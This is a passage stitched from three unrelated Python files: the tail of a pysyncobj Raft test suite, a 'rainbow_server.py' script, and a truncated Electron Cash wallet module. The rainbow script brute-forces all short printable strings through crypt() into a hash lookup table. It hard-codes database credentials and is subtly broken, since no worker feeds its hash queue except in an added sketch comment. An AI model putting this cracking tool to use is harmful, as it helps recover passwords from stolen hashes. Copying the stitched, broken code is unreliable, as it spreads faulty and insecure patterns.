o1._destroy()
o2._destroy()
def test_leaderFallback():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], leaderFallbackTimeout=30.0)
o2 = TestObj(a[1], [a[0]], leaderFallbackTimeout=30.0)
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 5.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1._SyncObj__conf.leaderFallbackTimeout = 3.0
o2._SyncObj__conf.leaderFallbackTimeout = 3.0
doTicks([o for o in objs if o._isLeader()], 2.0)
assert o1._isLeader() or o2._isLeader()
doTicks([o for o in objs if o._isLeader()], 2.0)
assert not o1._isLeader() and not o2._isLeader()
class ZeroDeployConsumerAlpha(SyncObjConsumer):
@replicated(ver=1)
def someMethod(self):
pass
@replicated
def methodTwo(self):
pass
class ZeroDeployConsumerBravo(SyncObjConsumer):
@replicated
def alphaMethod(self):
pass
@replicated(ver=3)
def methodTwo(self):
pass
class ZeroDeployTestObj(SyncObj):
def __init__(self, selfAddr, otherAddrs, consumers):
cfg = SyncObjConf(autoTick=False)
super(ZeroDeployTestObj, self).__init__(selfAddr, otherAddrs, cfg, consumers=consumers)
@replicated
def someMethod(self):
pass
@replicated
def otherMethod(self):
pass
@replicated(ver=1)
def thirdMethod(self):
pass
@replicated(ver=2)
def lastMethod(self):
pass
@replicated(ver=3)
def lastMethod(self):
pass
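# Note: as the assertions in test_zeroDeployVersions below rely on, @replicated and
# @replicated(ver=N) register each method under a version-suffixed name (e.g.
# otherMethod_v0, lastMethod_v2, lastMethod_v3), and the generated method IDs are
# ordered so that higher-version methods get larger IDs than lower-version ones.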
def test_zeroDeployVersions():
random.seed(42)
a = [getNextAddr()]
cAlpha = ZeroDeployConsumerAlpha()
cBravo = ZeroDeployConsumerBravo()
o1 = ZeroDeployTestObj(a[0], [], [cAlpha, cBravo])
assert hasattr(o1, 'otherMethod_v0') == True
assert hasattr(o1, 'lastMethod_v2') == True
assert hasattr(o1, 'lastMethod_v3') == True
assert hasattr(o1, 'lastMethod_v4') == False
assert hasattr(cAlpha, 'methodTwo_v0') == True
assert hasattr(cBravo, 'methodTwo_v3') == True
assert o1._methodToID['lastMethod_v2'] > o1._methodToID['otherMethod_v0']
assert o1._methodToID['lastMethod_v3'] > o1._methodToID['lastMethod_v2']
assert o1._methodToID['lastMethod_v3'] > o1._methodToID['someMethod_v0']
assert o1._methodToID['thirdMethod_v1'] > o1._methodToID['someMethod_v0']
assert o1._methodToID['lastMethod_v2'] > o1._methodToID[(id(cAlpha), 'methodTwo_v0')]
assert o1._methodToID[id(cBravo), 'methodTwo_v3'] > o1._methodToID['lastMethod_v2']
assert 'someMethod' not in o1._methodToID
assert 'thirdMethod' not in o1._methodToID
assert 'lastMethod' not in o1._methodToID
def test_dnsResolverBug(monkeypatch):
monkeypatch.setattr(dns_resolver, "monotonicTime", lambda: 0.0)
resolver = dns_resolver.DnsCachingResolver(600, 30)
ip = resolver.resolve('localhost')
assert ip == '127.0.0.1'
class MockSocket(object):
def __init__(self, socket, numSuccessSends):
self.socket = socket
self.numSuccessSends = numSuccessSends
def send(self, data):
self.numSuccessSends -= 1
if self.numSuccessSends <= 0:
return -100500
return self.socket.send(data)
def close(self):
return self.socket.close()
def getsockopt(self, *args, **kwargs):
return self.socket.getsockopt(*args, **kwargs)
def recv(self, *args, **kwargs):
return self.socket.recv(*args, **kwargs)
def setMockSocket(o, numSuccess = 0):
for readonlyNode in o._SyncObj__readonlyNodes:
for node, conn in o._SyncObj__transport._connections.items():
if node == readonlyNode:
origSocket = conn._TcpConnection__socket
conn._TcpConnection__socket = MockSocket(origSocket, numSuccess)
#origSend = origSocket.send
#origSocket.send = lambda x: mockSend(origSend, x)
#print("Set mock send")
def test_readOnlyDrop():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
o3 = TestObj(None, [a[0], a[1]])
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350 and o3.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
assert o3.getCounter() == 350
setMockSocket(o1, 1)
setMockSocket(o2, 1)
global _g_numSuccessSends
_g_numSuccessSends = 0
for i in range(150):
o1.addValue(1)
for i in range(200):
o2.addValue(1)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 700 and o2.getCounter() == 700)
assert o1.getCounter() == 700
assert o2.getCounter() == 700
o1._destroy()
o2._destroy()
o3._destroy()
def test_filterParners():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[0]])
assert len(o1._SyncObj__otherNodes) == 1
|
rainbow_server.py
|
#!/usr/bin/python
import crypt
import psycopg2
import multiprocessing
from string import ascii_letters, digits, printable
from itertools import product
from threading import Thread
def generate_data(q, maxlen=2, minlen=1):
""" create base passwords for consumer threads to crypt
"""
    alphabet = printable  # use the full printable character set as the password alphabet
for l in range(minlen, maxlen+1):
for s in product(alphabet, repeat=l):
q.put( ''.join(s) )
def record_data(q):
""" pull data from the queue and add to database
"""
db = psycopg2.connect(
dbname='rainbow',
host='humpy',
user='rainbow',
password='bowrain',
    )
    cur = db.cursor()
while True:
vals = q.get()
for val in vals:
#print val['h']
try:
cur.execute("""
INSERT INTO three_des
(pass, hash)
VALUES(%(p)s, %(h)s)
""",
val
)
            except psycopg2.Error:
                print("Failed to insert")
db.commit()
q.task_done()
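# NOTE (editor's sketch, not part of the original script): generate_data fills the
# `passwords` queue and record_data drains the `hashes` queue, but nothing in this
# file actually crypts passwords and feeds `hashes`. A worker along these lines is
# presumably what the generate_data docstring refers to; the salt value and the
# {'p': ..., 'h': ...} record shape are assumptions inferred from record_data's
# INSERT statement.
def crypt_data(in_q, out_q, salt='aa'):
    """ hypothetical consumer: crypt() each password and hand the result to record_data """
    while True:
        password = in_q.get()
        out_q.put([{'p': password, 'h': crypt.crypt(password, salt)}])
        in_q.task_done()
# It would be started like the other workers, e.g.:
#   for i in range(4):
#       multiprocessing.Process(target=crypt_data, args=(passwords, hashes)).start()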
passwords = multiprocessing.JoinableQueue(maxsize=0)
hashes = multiprocessing.JoinableQueue(maxsize=0)
# only one generator
for i in range(1):
t = multiprocessing.Process( target=generate_data, args=(passwords, 5, 1))
t.start()
# two data recorder processes
for i in range(2):
t = multiprocessing.Process( target=record_data, args=(hashes,))
t.start()
passwords.join()
print("all passwords consumed")
hashes.join()
print("all hashes done")
for p in multiprocessing.active_children():
    print("joining process", p.pid)
    p.join(2)
    if p.is_alive():
        print("terminating process", p.pid)
        p.terminate()
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import re
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee, PrintError,
UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string,
TimeoutException, is_verbose)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .paymentrequest import InvoiceStore
from .contacts import Contacts
from . import cashacct
from .slp import SlpMessage, SlpParsingError, SlpUnsupportedSlpTokenType, SlpInvalidOutputMessage, SlpNoMintingBatonFound, OpreturnError
from . import slp_validator_0x01, slp_validator_0x01_nft1
from .slp_graph_search import slp_gs_mgr
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
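# The temporary `_` defined above is an identity function: it marks the TX_STATUS
# strings for translation extraction without translating them at import time. It is
# then deleted and the real gettext `_` is re-imported, so the strings get translated
# later, at display time.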
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
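# Usage sketch (editor's example; the surrounding objects are assumptions -- any
# connected Network instance and a config providing estimate_fee() will do):
#   wif_keys = ['<WIF-encoded private key>']
#   tx = sweep(wif_keys, network, config, recipient_address)
#   # `tx` is a fully signed Transaction, ready to be broadcast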
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.pre_release_tag = PRE_RELEASE_TAG
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
finalization_print_error(self.cashacct) # debug object lifecycle
# slp graph databases for token type 1 and NFT1
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
        # address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
        # We keep sets of the receiving and change addresses so that is_mine()
        # checks are O(1) on average rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
        # Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
        # The two types of freezing are flagged independently of each other; a coin
        # is 'spendable' only if it is not frozen at either level.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@property
def is_slp(self):
''' Note that the various Slp_* classes explicitly write to storage
to set the proper wallet_type on construction unconditionally, so
this should always be valid for SLP wallets. '''
return "slp_" in self.storage.get('wallet_type', '')
@classmethod
def to_Address_dict(cls, d):
        '''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slpv1_validity = self.storage.get('slpv1_validity', {})
self.token_types = self.storage.get('token_types', {})
self.tx_tokinfo = self.storage.get('tx_tokinfo', {})
# load up slp_txo as defaultdict-of-defaultdict-of-dicts
self._slp_txo = defaultdict(lambda: defaultdict(dict))
for addr, addrdict in self.to_Address_dict(self.storage.get('slp_txo',{})).items():
for txid, txdict in addrdict.items():
# need to do this iteration since json stores int keys as decimal strings.
self._slp_txo[addr][txid] = {int(idx):d for idx,d in txdict.items()}
ok = self.storage.get('slp_data_version', False)
if ok != 3:
self.rebuild_slp()
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
### SLP stuff
self.storage.put('slpv1_validity', self.slpv1_validity)
self.storage.put('token_types', self.token_types)
self.storage.put('slp_txo', self.from_Address_dict(self._slp_txo))
self.storage.put('tx_tokinfo', self.tx_tokinfo)
self.storage.put('slp_data_version', 3)
if write:
self.storage.write()
def activate_slp(self):
# This gets called in two situations:
# - Upon wallet startup, it checks config to see if SLP should be enabled.
# - During wallet operation, on a network reconnect, to "wake up" the validator -- According to JSCramer this is required. TODO: Investigate why that is
with self.lock:
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes
try:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError:
continue
_add_token_hex_re = re.compile('^[a-f0-9]{64}$')
def add_token_type(self, token_id, entry, check_validation=True):
if not isinstance(token_id, str) or not self._add_token_hex_re.match(token_id):
# Paranoia: we enforce canonical hex string as lowercase to avoid
# problems with the same token-id being added as upper or lowercase
# by client code. This is because token_id becomes a dictionary key
# in various places and it not being identical would create chaos.
raise ValueError('token_id must be a lowercase hex string of exactly 64 characters!')
with self.lock:
self.token_types[token_id] = dict(entry)
self.storage.put('token_types', self.token_types)
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes of matching token_id
try:
if tti['token_id'] == token_id and check_validation:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError: # This catches the case where tx_tokinfo was set to {}
continue
def add_token_safe(self, token_class: str, token_id: str, token_name: str,
decimals_divisibility: int,
*, error_callback=None, allow_overwrite=False,
write_storage=True) -> bool:
''' This code was refactored from main_window.py to allow other
subsystems (eg CLI/RPC, other platforms, etc) to add tokens.
This function does some minimal sanity checks and returns True
on success or False on failure. The optional error_callback
is called on False return. The callback takes a single translated string
argument which is an error message (suitable for display to the user).
On success (True) return, this method ends up calling
self.add_token_type(), and also will end up saving the changes to
wallet storage if write_storage=True (the default).
This function is thread-safe. '''
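        # Example (editor's sketch; the token id, name and decimals are made-up values):
        #   ok = wallet.add_token_safe('SLP1', '<64 lowercase hex chars>', 'MYTOKEN', 8,
        #                              error_callback=lambda msg: print(msg))
        #   # on success this persists the entry via add_token_type() and returns True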
token_name = token_name.strip()
token_id = token_id.strip().lower()
# Check for duplication error
d = self.token_types.get(token_id)
group_id = d.get('group_id', None) if d else None
if d is not None and not allow_overwrite:
if error_callback:
error_callback(_('Token with this hash id already exists'))
return False
for tid, d in self.token_types.copy().items(): # <-- must take a snapshot-copy here since we aren't holding locks and other threads may modify this dict as we iterate
if d['name'] == token_name and tid != token_id:
token_name = token_name + "-" + token_id[:3]
break
#Hash id validation
gothex = self._add_token_hex_re.match(token_id)
if not gothex:
if error_callback:
error_callback(_('Invalid token_id hash'))
return False
#token name validation
# if len(token_name) < 1 or len(token_name) > 20:
# if error_callback:
# error_callback(_('Token name should be 1-20 characters'))
# return False
new_entry = {
'class' : token_class,
'name' : token_name,
'decimals' : decimals_divisibility,
}
if token_class == "SLP65":
if group_id is None:
new_entry['group_id'] = "?"
else:
new_entry['group_id'] = group_id
self.add_token_type(token_id, new_entry)
self.save_transactions(bool(write_storage))
return True
def add_token_from_genesis_tx(self, tx_or_raw, *, error_callback=None, allow_overwrite=True) -> SlpMessage:
''' Returns None on failure, optionally calling error_callback
with a translated UI-suitable error message. Returns a valid
SlpMessage object on success. In exceptional circumstances (garbage
inputs), may raise.
Note that unlike the other add_token_* functions, this version defaults
to allow_overwrite = True.'''
tx = tx_or_raw
if not isinstance(tx, Transaction):
tx = Transaction(tx)
def fail(msg):
if error_callback:
error_callback(msg)
return None
token_id = tx.txid()
try:
slpMsg = SlpMessage.parseSlpOutputScript(tx.outputs()[0][1])
except SlpUnsupportedSlpTokenType as e:
return fail(_("Unsupported SLP token version/type - %r.")%(e.args[0],))
except SlpInvalidOutputMessage as e:
return fail(_("This transaction does not contain a valid SLP message.\nReason: %r.")%(e.args,))
if slpMsg.transaction_type != 'GENESIS':
return fail(_("This is an SLP transaction, however it is not a genesis transaction."))
token_name = slpMsg.op_return_fields['ticker'].decode('utf-8') or slpMsg.op_return_fields['token_name'].decode('utf-8')
decimals = slpMsg.op_return_fields['decimals']
token_class = 'SLP%d' % (slpMsg.token_type,)
if self.add_token_safe(token_class, token_id, token_name, decimals, error_callback=fail, allow_overwrite=allow_overwrite):
return slpMsg
else:
return None
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
        # Do two O(1) average-case set membership checks rather than two O(N)
